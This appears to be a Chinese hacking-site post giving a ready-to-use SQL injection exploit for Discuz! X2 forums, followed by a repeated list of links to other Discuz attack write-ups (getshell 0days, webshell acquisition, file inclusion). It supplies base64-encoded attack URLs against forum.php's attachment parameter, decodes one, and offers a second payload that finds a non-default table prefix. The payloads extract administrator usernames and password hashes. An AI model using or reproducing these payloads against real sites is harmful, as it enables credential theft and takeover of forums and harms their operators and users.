程序版本: Discuz! X2
DZ2.0直接暴管理账号密码(默认前缀的情况下)
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd
29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGl
rZSAnYWRtaW58eHx5%3D
base64解码
1′ and 1=2 union all select 1,group_concat(username,0x7C3274747C,password)
from pre_common_member where username like ‘admin|x|y
如果不是默认前缀
暴前缀EXP
/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2V
sZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMR
VMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1
FIGxpa2UgJyVfbWVtYmVyfHh8eQ%3D
只显示10条记录相关文章
Discuz!X2.5 Release 20120407 Getshell 0day (浏览: 22636, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16906, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14462, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46375, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50182, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23268, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15974, 评论: 0)
dz~~~~马后炮 (浏览: 10676, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11778, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18647, 评论: 0)
Discuz!NT 2.x – 3.5.2 (浏览: 16906, 评论: 0)
DiscuzX1-1.5 Sql 0day (浏览: 14462, 评论: 0)
discuz x1.5 discuz 7.2 后台getshell 0day通杀0day (浏览: 46375, 评论: 0)
DISCUZX1.5 本地文件包含漏洞 (浏览: 50182, 评论: 0)
DiscuzX1.5 门户管理权限SQL注入漏洞 (浏览: 23268, 评论: 0)
Discuz!后台怎么拿到Webshell (浏览: 15974, 评论: 0)
dz~~~~马后炮 (浏览: 10676, 评论: 0)
Discuz非创始人管理员代码执行 (浏览: 11778, 评论: 0)
Discuz 7.0-7.2后台拿Shell (浏览: 18647, 评论: 0)